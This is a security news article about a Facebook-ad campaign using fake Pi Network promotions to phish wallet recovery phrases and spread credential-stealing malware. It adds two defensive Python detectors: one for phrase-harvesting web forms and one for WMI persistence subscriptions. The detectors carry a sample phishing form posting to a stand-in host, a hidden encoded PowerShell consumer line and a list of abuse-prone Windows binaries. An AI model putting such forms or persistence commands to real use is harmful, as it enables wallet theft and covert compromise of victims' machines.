Threat Actors Weaponizing Facebook Ads to Deliver Malware and Steal Wallet Passwords

Cybercriminals have launched a sophisticated campaign exploiting Facebook’s advertising platform to distribute malware and steal cryptocurrency wallet credentials, targeting users worldwide through deceptive Pi Network-themed advertisements.

The malicious operation began on June 24, 2025, timed to the Pi2Day celebration, and has already deployed over 140 ad variations to maximize its reach across multiple continents.

The attack campaign demonstrates a coordinated effort by threat actors who have weaponized legitimate social media advertising mechanisms to deliver multi-stage malware payloads.

These malicious advertisements masquerade as official Pi Network promotions, offering fake mining applications and fraudulent wallet access portals that promise users substantial cryptocurrency rewards.

The campaign’s global scope encompasses the United States, Europe, Australia, China, Vietnam, India, and the Philippines, indicating a well-resourced operation with international ambitions.

The threat actors employ two primary attack vectors to compromise victims. The first involves phishing pages that meticulously mimic legitimate Pi Wallet interfaces, prompting users to enter their 24-word recovery phrases under the pretense of claiming 628 Pi tokens or participating in exclusive airdrop events.

Phishing page (Source – Bitdefender)

Once entered, the recovery phrase hands the attackers the wallet itself: the phrase deterministically regenerates the signing keys, so no password, device or approval step stands between them and an immediate transfer of the victim's funds.
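How a defender might flag such a phrase-harvesting page automatically, as an added example that is not code from the article, from Bitdefender or from the campaign: the scanner below parses a page's forms with the Python standard library and scores the signals a recovery-phrase phishing form tends to carry (a dozen or more free-text inputs, field names like word1..word24 or mnemonic, labels that mention a 12- or 24-word recovery phrase, and a POST target on a different host). The page URLs, hostnames, HTML samples and the threshold are constructed assumptions for illustration, not indicators from the real campaign.

```python
"""Flag web forms that harvest wallet recovery phrases.

Added example for this article; not Bitdefender's or the campaign's code.
Stdlib only. Sample pages, hostnames and thresholds are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Label/placeholder wording typical of phrase-phishing pages
PHRASE_WORDS = re.compile(
    r"(recovery|secret|seed|mnemonic|pass ?phrase|backup) ?(phrase|words|key)"
    r"|\b(12|24)[ -]?words?\b",
    re.I,
)
# Field names such as word1..word24, w7, phrase_3, or a single mnemonic box
FIELD_NAME = re.compile(
    r"^(word|w|phrase|seed|mnemonic)[_-]?\d{1,2}$|mnemonic|seed|passphrase|recovery",
    re.I,
)


class _FormCollector(HTMLParser):
    """Per <form>: action, free-text field names, visible and placeholder text."""

    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "fields": [], "text": []}
            self.forms.append(self._cur)
        elif self._cur is not None and tag in ("input", "textarea"):
            itype = (a.get("type") or "text").lower()
            if tag == "textarea" or itype in ("text", "password"):
                self._cur["fields"].append(a.get("name") or a.get("id") or "")
            for attr in ("placeholder", "aria-label"):
                if a.get(attr):
                    self._cur["text"].append(a[attr])

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

    def handle_data(self, data):
        if self._cur is not None and data.strip():
            self._cur["text"].append(data.strip())


def score_form(form, page_host):
    """Return (score, reasons); heuristics are independent so a same-site
    POST does not mask a page that still asks for 24 words."""
    score, reasons = 0, []
    n = len(form["fields"])
    if n >= 12:                         # one box per word of a 12/24-word phrase
        score += 3
        reasons.append(f"{n} free-text fields")
    named = sum(1 for f in form["fields"] if FIELD_NAME.search(f))
    if named:
        score += 2
        reasons.append(f"{named} field(s) named like phrase slots")
    if any(PHRASE_WORDS.search(t) for t in form["text"]):
        score += 2
        reasons.append("text mentions a recovery/seed phrase")
    action_host = urlparse(form["action"]).hostname
    if action_host and action_host != page_host:
        score += 2
        reasons.append(f"posts off-site to {action_host}")
    return score, reasons


def scan_page(html, page_url, threshold=4):
    """Return the forms on the page scoring at or above threshold (assumed 4)."""
    parser = _FormCollector()
    parser.feed(html)
    parser.close()
    host = urlparse(page_url).hostname
    return [
        {"action": f["action"], "score": s, "reasons": r}
        for f in parser.forms
        for s, r in [score_form(f, host)]
        if s >= threshold
    ]


# --- constructed samples (not real campaign pages) -----------------------
LEGIT_LOGIN = """<form action="/login" method="post">
  <label>Username</label><input type="text" name="username">
  <label>Password</label><input type="password" name="password">
  <input type="submit" value="Sign in"></form>"""

# Mimics the 'enter your 24 words to claim tokens' lure: one box per word
PHISH_24_FIELDS = (
    '<form action="https://collector.example/submit" method="post">'
    "<p>Enter your 24-word recovery phrase to claim your bonus</p>"
    + "".join(f'<input type="text" name="word{i}">' for i in range(1, 25))
    + '<input type="submit" value="Claim"></form>'
)

# Single paste box posting to the same site: fewer signals, still flagged
PHISH_TEXTAREA = """<form action="/claim" method="post">
  <textarea name="mnemonic" placeholder="Paste your 24 words here"></textarea>
  <button type="submit">Claim</button></form>"""

if __name__ == "__main__":
    print(scan_page(LEGIT_LOGIN, "https://wallet.example/login"))
    print(scan_page(PHISH_24_FIELDS, "https://pi-airdrop.example/claim"))
    print(scan_page(PHISH_TEXTAREA, "https://pi-airdrop.example/claim"))
```

The scoring is additive on purpose: a page that posts to its own host and uses a single paste box still reaches the threshold on wording and field name alone, while an ordinary username/password form scores zero. In production this sits behind a URL scanner or proxy that fetches the ad's landing page, and the threshold is tuned against the organisation's own false-positive budget.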

Bitdefender researchers identified the second attack vector as malware-embedded applications disguised as Pi Network mining software.

These deceptive installers promise users bonuses of 31.4 Pi tokens for downloading and executing PC applications.

However, the software packages contain malicious payloads identified as Generic.MSIL.WMITask and Generic.JS.WMITask variants, representing multi-stage malware previously analyzed by Bitdefender’s security team in May 2025.

Multi-Stage Malware Infection Mechanism

The infection chain is built to evade detection and to persist on the compromised system.

On first execution the installer's payload is obfuscated to slow signature-based antivirus scanning and to hinder sandbox analysis, and it fetches the remaining components in later stages rather than carrying them all in the initial file.

The detection names (Generic.MSIL.WMITask, Generic.JS.WMITask) indicate a .NET (MSIL) component and a JavaScript stage and suggest WMI-based tasking, but the article does not detail how the stages hand off to each other.

The primary payload focuses on credential harvesting, systematically extracting saved passwords, authentication tokens, and cryptocurrency wallet keys from infected systems.

Simultaneously, the malware deploys keylogging capabilities to capture real-time user input, including newly entered passwords, recovery phrases, and sensitive financial information.

Persistence keeps the malware running across reboots, and a command-and-control channel carries stolen data out and further components in. The article names neither the persistence mechanism nor the C2 infrastructure, so defenders should hunt on behaviour (new WMI event subscriptions or scheduled tasks, unexpected outbound connections from the installer's process tree) rather than wait for fixed indicators.
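The article does not describe the persistence mechanism, but the detection names (Generic.MSIL.WMITask, Generic.JS.WMITask) point to WMI-based tasking. Assuming the classic permanent WMI event subscription (an __EventFilter bound to a CommandLineEventConsumer or ActiveScriptEventConsumer), the added example below, which is not code from the article or from Bitdefender, correlates Sysmon event IDs 19 (WmiEventFilter), 20 (WmiEventConsumer) and 21 (WmiEventConsumerToFilter) into a single alert and rates it on whether the consumer launches a script host and whether the filter fires on a boot or timer trigger. The event records are constructed and simplified (Sysmon's real fields are richer), and the consumer name UpdaterTask, the hosts WS01/WS02 and the keyword lists are illustrative assumptions.

```python
"""Correlate Sysmon WMI-subscription events (IDs 19/20/21) into an alert.

Added example; not code from the article or Bitdefender. The subscription
pattern is an assumption drawn from the 'WMITask' detection names. All
event records below are constructed and simplified.
"""
import re
from typing import Iterable

SUSPICIOUS_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
LOLBINS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "cmd.exe",
           "rundll32", "regsvr32", "certutil", "bitsadmin")
# Triggers malware favours: fire shortly after boot, on a timer, or at logon
TRIGGER_HINTS = ("SystemUpTime", "Win32_LocalTime", "__TimerEvent",
                 "Win32_LogonSession", "Win32_ProcessStartTrace")

_NAME_IN_PATH = re.compile(r'Name="([^"]+)"')


def _wmi_name(ref: str) -> str:
    """ID 21 references consumers/filters by WMI path, e.g.
    \\\\.\\root\\subscription:CommandLineEventConsumer.Name="X";
    reduce a full path or a bare name to the Name value."""
    m = _NAME_IN_PATH.search(ref)
    return m.group(1) if m else ref


def correlate(events: Iterable[dict]) -> list[dict]:
    """Emit one alert per binding that joins a filter to a script/command
    consumer on the same host. Deletions are ignored: removing a
    subscription is not persistence."""
    filters, consumers, alerts = {}, {}, []
    for e in sorted(events, key=lambda x: x["UtcTime"]):
        if e.get("Operation") != "Created":
            continue
        host = e["Computer"]
        if e["EventID"] == 19:              # WmiEventFilter activity
            filters[(host, e["Name"])] = e
        elif e["EventID"] == 20:            # WmiEventConsumer activity
            consumers[(host, e["Name"])] = e
        elif e["EventID"] == 21:            # WmiEventConsumerToFilter activity
            c = consumers.get((host, _wmi_name(e["Consumer"])))
            f = filters.get((host, _wmi_name(e["Filter"])))
            if not c or not f or c["Type"] not in SUSPICIOUS_CONSUMERS:
                continue                    # built-in consumer types or partial view
            dest = c.get("Destination", "")
            lolbin = any(b in dest.lower() for b in LOLBINS)
            timed = any(h in f.get("Query", "") for h in TRIGGER_HINTS)
            alerts.append({
                "host": host, "user": e.get("User", ""),
                "filter": f["Name"], "query": f.get("Query", ""),
                "consumer": c["Name"], "type": c["Type"], "destination": dest,
                "severity": "high" if (lolbin or timed) else "medium",
            })
    return alerts


# --- constructed, simplified Sysmon records ------------------------------
_SYS = "NT AUTHORITY\\SYSTEM"
SAMPLE_EVENTS = [
    # WS01: the SCM Event Log subscription Windows ships with (benign)
    {"EventID": 19, "Computer": "WS01", "UtcTime": "2025-06-25 09:00:01.000",
     "Operation": "Created", "User": _SYS, "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Computer": "WS01", "UtcTime": "2025-06-25 09:00:01.100",
     "Operation": "Created", "User": _SYS, "Name": "SCM Event Log Consumer",
     "Type": "NTEventLogEventConsumer"},
    {"EventID": 21, "Computer": "WS01", "UtcTime": "2025-06-25 09:00:01.200",
     "Operation": "Created", "User": _SYS,
     "Consumer": '\\\\.\\root\\subscription:NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '\\\\.\\root\\subscription:__EventFilter.Name="SCM Event Log Filter"'},
    # WS02: constructed malicious subscription created by the user's session
    {"EventID": 19, "Computer": "WS02", "UtcTime": "2025-06-25 14:12:03.000",
     "Operation": "Created", "User": "WS02\\victim", "Name": "UpdaterTask",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
              "TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' "
              "AND TargetInstance.SystemUpTime >= 240"},
    {"EventID": 20, "Computer": "WS02", "UtcTime": "2025-06-25 14:12:03.050",
     "Operation": "Created", "User": "WS02\\victim", "Name": "UpdaterTask",
     "Type": "CommandLineEventConsumer",
     "Destination": "powershell.exe -NoP -W Hidden -Enc <base64 stage>"},
    {"EventID": 21, "Computer": "WS02", "UtcTime": "2025-06-25 14:12:03.100",
     "Operation": "Created", "User": "WS02\\victim",
     "Consumer": '\\\\.\\root\\subscription:CommandLineEventConsumer.Name="UpdaterTask"',
     "Filter": '\\\\.\\root\\subscription:__EventFilter.Name="UpdaterTask"'},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a["severity"], a["host"], a["consumer"], "->", a["destination"])
```

The correlation keys on host plus subscription name because the three Sysmon events arrive separately and a filter or consumer on its own is not yet persistence; only the binding (ID 21) completes it. Severity is raised when the consumer runs a script host or the filter watches system uptime, which is the usual "run a few minutes after boot" trigger.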

The campaign's success stems from exploiting users' trust in ads served by an established platform and their limited familiarity with cryptocurrency custody, above all the rule that a recovery phrase is never entered into a website.

By leveraging Facebook’s advertising legitimacy and Pi Network’s growing popularity, threat actors have created an effective distribution mechanism that continues to evolve and adapt to security countermeasures.
